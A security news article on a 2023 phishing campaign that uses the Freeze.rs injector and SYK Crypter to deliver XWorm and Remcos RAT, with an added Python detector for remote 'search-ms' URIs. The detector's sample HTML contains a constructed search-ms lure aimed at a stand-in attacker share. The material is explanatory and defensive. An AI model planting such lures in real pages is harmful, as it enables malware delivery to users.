New Attack Alert Freeze[.]rs Injector Weaponized for XWorm Malware Attacks


A new attack methodology has come to light, as malicious entities employ a legitimate Rust-based injector named Freeze[.]rs to distribute the XWorm commodity malware. Fortinet FortiGuard Labs discovered this novel approach on July 13, 2023. The assault originates with a deceptive PDF file dispatched via a phishing email, initiating a chain reaction.

The attack sequence utilizes SYK Crypter, a tool previously associated with various malware strains, to introduce Remcos RAT. Security analyst Cara Lin explained that the PDF file redirects to an HTML file that uses the ‘search-ms’ protocol handler to reach an LNK file on a remote server. Clicking the LNK file runs a PowerShell script, which launches Freeze[.]rs and SYK Crypter for the subsequent stages, the report said.

Freeze[.]rs, unveiled by Optiv on May 4, 2023, serves as an open-source red teaming tool. It excels in creating payloads that bypass security solutions and execute shellcode discreetly. This tool removes Userland EDR hooks and artfully executes shellcode, outmaneuvering endpoint monitoring controls.


By contrast, SYK Crypter is a versatile distribution tool for a range of malware families, including AsyncRAT, NanoCore RAT, and QuasarRAT. This crypter is retrieved from the Discord content delivery network, camouflaging itself within seemingly benign emails.

This multifaceted attack employs multiple layers of obfuscation, leveraging the “search-ms” URI protocol handler. By imitating local searches, malicious files are disguised as legitimate attachments.
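As an added defensive example (not code from the Fortinet report or this article), the following Python scans an HTML page for search-ms: URIs whose location crumb points at a remote path rather than a local folder, which is the trick the redirect stage above relies on; the sample HTML and the hostname in it are constructed placeholders.

```python
"""Flag search-ms: URIs in HTML that aim a Windows Search at a remote location."""
import html
import re
from urllib.parse import unquote

# A search-ms URI inside an attribute value or inline script, ending at a quote/space/tag.
SEARCH_MS_RE = re.compile(r'search-ms:[^"\'\s<>]+', re.IGNORECASE)

# Location values that are not a local drive path: UNC, forward-slash UNC, HTTP(S)/WebDAV.
REMOTE_LOCATION_RE = re.compile(r'^(\\\\|//|https?://)', re.IGNORECASE)


def parse_search_ms(uri: str) -> dict:
    """Split 'search-ms:key=value&key=value' into a dict of decoded parameters."""
    params = {}
    body = html.unescape(uri).split(":", 1)[1]
    for part in body.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.strip().lower()] = unquote(value)
    return params


def is_remote_location(params: dict) -> bool:
    """True when the 'crumb' parameter names a location outside the local machine."""
    crumb = params.get("crumb", "")
    if crumb.lower().startswith("location:"):
        target = crumb.split(":", 1)[1].strip()
        return bool(REMOTE_LOCATION_RE.match(target))
    return False


def find_remote_search_ms(page: str) -> list:
    """Return every search-ms URI in the page whose location crumb is remote."""
    return [uri for uri in SEARCH_MS_RE.findall(page)
            if is_remote_location(parse_search_ms(uri))]


# Constructed sample mimicking the redirect page; attacker.example is a placeholder host.
SAMPLE_HTML = r"""
<html><body>
<a href="search-ms:query=invoice&crumb=location:C:\Users\Public&displayname=Downloads">Local</a>
<iframe src="search-ms:query=invoice&crumb=location:\\attacker.example\share&displayname=Downloads">
</iframe>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_remote_search_ms(SAMPLE_HTML):
        print("remote search-ms URI:", hit)
```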

Ultimately, the injected shellcode decrypts and deploys the XWorm remote access trojan, gathering sensitive data and granting remote control over the compromised system.

Targeting Europe and North America

The alarming speed at which Freeze[.]rs was adopted for offensive purposes underscores the adaptability of malicious actors. The PowerShell script, apart from loading the injector, activates another executable, serving as a dropper fetching the SYK Crypter with encrypted Remcos RAT.

Security researcher Cara Lin noted that the amalgamation of XWorm and Remcos RAT creates a formidable trojan with diverse malicious capabilities. Reports from the C2 server traffic reveal that Europe and North America are the primary targets of this campaign.
